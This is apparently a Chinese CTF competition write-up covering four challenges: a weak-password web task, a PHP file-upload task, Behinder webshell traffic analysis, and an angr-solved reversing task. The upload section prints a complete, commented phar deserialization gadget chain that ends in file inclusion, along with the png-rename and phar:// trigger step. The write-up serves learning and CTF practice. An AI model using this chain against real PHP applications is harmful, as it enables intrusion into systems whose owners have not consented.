bili_22_1024

今年比往年难,这一点很明显:去年抄答案混分,还说今年必然会做

只做了三道题,菜

  • ezinvader

    js文件里头有个颜文字,解出来有个post,直接跑密码,提示了8个星号,8位弱密码

    Aa123456,在响应头里,

    其实我自己没跑出来???

    问了别人密码,原来重置一下 session id 就行了

  • up

    文件上传

    <?php
    
    // flag in /tmp/flag.php 
    
    
    // Copy of the target's Modifier class. Its __invoke() includes a fixed file, so
    // it only matters if an instance is ever called as a function; the chain built
    // at the bottom of this file does not use it.
    class Modifier {
    
        public function __invoke(){
            include("index.php");
        }
    }
    
    // Copy of the target's Action class. Both properties are public, so when an
    // Action is unserialized their values come straight from the serialized data.
    class Action {
        // Path that run() passes to include(); the only filter on it is the
        // substring check below.
        public $checkAccess='index.php';
        // Default is a non-integer string: it survives the strict !== 0 / !== 1
        // guard in run() while still being compared loosely by the switch.
        public $id='0a';
    
        // Includes $checkAccess unless the path contains "upload". Note the
        // blocklist is a single substring, not a path/allowlist check.
        public function run()
        {  
            if(strpos($this->checkAccess, 'upload') !== false){ 
                echo "error path";
                exit();
            } 
    
            // Strict guard: only integer 0 and integer 1 are rejected here ...
            if ($this->id !== 0 && $this->id !== 1) {
                // ... but switch compares with ==, so a string like '0a' can still
                // match case 0 on PHP 7.x (PHP 8 changed int/string comparison; the
                // target's PHP version is not visible in this listing).
                switch($this->id) {
                    case 0:
                        if ($this->checkAccess) {
                            // Sink of the chain: file inclusion with a path taken
                            // from object state rather than from trusted code.
                            include($this->checkAccess);
                        }
                        break;
                    case 1:
                        throw new Exception("id invalid in ".__CLASS__.__FUNCTION__);
                        break;
                    default:
                        break;         
                }
            }
        }
    
    }
    
    // Copy of the target's Content class. $formatters is a public map from method
    // name to callable, so its contents are whatever the serialized data says.
    class Content {
    
        public $formatters;
    
        // Resolves $formatter to a callable: first from the $formatters cache, then
        // by scanning $this->providers (never declared on this class — on an
        // unserialized Content with no such property the foreach would warn).
        // The debug echo lines are part of the copied challenge code.
        public function getFormatter($formatter)//close
        {
            echo $formatter,'-----';
            if (isset($this->formatters[$formatter])) {
                echo '222222222222';
                return $this->formatters[$formatter];
            }
    
            foreach ($this->providers as $provider) {
                if (method_exists($provider, $formatter)) {
                    $this->formatters[$formatter] = array($provider, $formatter);
                    return $this->formatters[$formatter];
                }
            }
            throw new \InvalidArgumentException(sprintf('Unknown formatter "%s"', $formatter));
        }
    
        // Any undefined method call (e.g. ->close()) is turned into a lookup in
        // $formatters and then invoked; with a public, unserializable $formatters
        // this lets object state decide which callable runs.
        public function __call($name, $arguments)
        {
            $a=$this->getFormatter($name);
            echo $a;
            return call_user_func_array($a, $arguments);
        }
    }
    
    // Copy of the target's Show class. All three properties are public.
    class Show{
        public $source;
        public $str;
        public $reader;
        // Only runs for objects created with new; unserialize() skips the constructor.
        public function __construct($file='index.php') {
            $this->source = $file;
            echo 'Welcome to '.$this->source."<br>";
        }
        // String conversion calls reset() on whatever $str holds.
        public function __toString() {
            echo 'string--------';
            $this->str->reset();
            return '';
        }
    
        // Runs on unserialize(). preg_match() receives $this->source as its subject;
        // if $source is an object with __toString, that conversion happens here,
        // before the regex is even evaluated. The echo after throw is unreachable.
        public function __wakeup() {
    
            if(preg_match("/gopher|phar|http|file|ftp|dict|\.\./i", $this->source)) {
                throw new Exception('invalid protocol found in '.__CLASS__);
                echo '111111111111111111';
            }
        }
    
        // Calls ->close() on $reader. If $reader is an object without a close()
        // method, its __call handler (see Content) receives the call instead.
        public function reset() {
    
            if ($this->reader !== null) {
                echo 'reset----'; 
                $this->reader->close();
            }
        }
    }
    // Object graph stored as phar metadata. From the class definitions above, the
    // intended order on unserialize() of $c is:
    //   Show::__wakeup ($c) -> preg_match() stringifies $c->source ($b)
    //   -> Show::__toString ($b) -> $b->str->reset() ($a)
    //   -> Show::reset ($a) -> $a->reader->close() ($d, a Content)
    //   -> Content::__call('close') -> formatters['close'] = [Action, 'run']
    //   -> Action::run -> include($checkAccess)
    $a=new Show();
    $a->str='1';
    $b=new Show;
    $b->reader='1';
    
    $d=new Content;
    $d->formatters['close']=array(new Action,'run');
    
    $a->reader=$d;
    $b->str=$a;
    
    
    // $c's source is an object, so the __wakeup regex sees $b's string form ('').
    $c=new Show($b);
    $c->str='1';
    $c->reader='1';
    
    
    // $a='O:4:"Show":3:{s:6:"source";O:4:"Show":3:{s:6:"source";s:9:"index.php";s:3:"str";O:4:"Show":3:{s:6:"source";s:9:"index.php";s:3:"str";s:1:"1";s:6:"reader";O:7:"Content":1:{s:10:"formatters";a:1:{s:5:"close";a:2:{i:0;O:6:"Action":2:{s:11:"checkAccess";s:9:"index.php";s:2:"id";s:2:"0a";}i:1;s:3:"run";}}}}s:6:"reader";s:1:"1";}s:3:"str";s:1:"1";s:6:"reader";s:1:"1";}';
    // unserialize($a)
    
    
    // Show __construct -> __toString -> reset -> Content __call -> close, with $this->formatters['close'] = [new Action(), 'run']
    
    
    // The metadata of a phar is unserialized by PHP whenever the archive is opened
    // through the phar:// wrapper, which is why user-controlled paths must never
    // reach file functions on a host that keeps this wrapper enabled.
    $phar=new phar('test.phar');
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER();?>");
    $phar->setMetadata($c);
    $phar->addFromString("flag.txt","flag");
    $phar->stopBuffering();
    
    ?>
    

    改后缀为png,上传上去,然后触发

    c=phar://xxx.png
    
  • 流量分析

    筛一下http,以前我没做过流量分析,看了提示,说是冰蝎流量,根据冰蝎流量的特征xor,解出flag

  • ezRe

    这是第六题

    菜死了,非预期解,完赛后看的wp

    # Symbolically execute the EzRe binary with angr and print the stdin that
    # drives it to a state whose stdout contains "welcome".
    import angr

    project = angr.Project("../../EzRe")
    manager = project.factory.simulation_manager()
    # dumps(1) is the accumulated stdout of a state; stop at the first state that printed "welcome".
    manager.explore(find=lambda state: b"welcome" in state.posix.dumps(1))
    # dumps(0) is the concretized stdin that reached the found state.
    print(manager.found[0].posix.dumps(0))